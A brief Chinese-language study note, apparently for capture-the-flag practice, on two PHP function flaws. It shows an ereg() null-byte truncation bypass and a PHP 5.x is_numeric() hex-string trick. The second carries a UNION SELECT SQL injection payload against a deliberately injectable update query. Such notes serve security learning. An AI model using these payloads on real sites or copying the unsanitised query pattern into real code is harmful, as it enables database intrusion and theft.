php函式漏洞總結
1、ereg()截斷漏洞
程式碼：

<?php
session_start();
if (isset($_POST['submit'])) {
  $verifycode = $_POST['verifycode'];
  $b = false;
  if (@ereg("^[1-9]+$", $verifycode) === FALSE)
  {
    $b = false;
    echo 'b is false';
  }
  else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE)   
  {
    $b
 
 = true;
     echo 'b is true';
  }
}
?>

payload：

9%00xiaoboshifudaiwofei

2、is_numeric()漏洞
程式碼：

 if(!is_numeric($page)){
              die("page must be a number!");   
          }
          if($page<1) $page=1;

          $sql="update page set num=$page";
          $res=mysql_my_query($sql
 
);
          if($res){
                echo "<script>alert('update  success!');</script>";
                echo("<script>location.href='./index.php?action=admin&mode=index'</script>");

          }else{
               echo "<script>alert('update  fail!');</script>"
 
;
               die();
          }

php 5.x 版本中 is_numeric 的缺陷 (php7.0 已經修復了 ), 它認為 0x…. 是整數

import binascii
a='1 union all select flag,flag,flag,flag from flags'
binascii.hexlify(a)
3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773

page:

0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773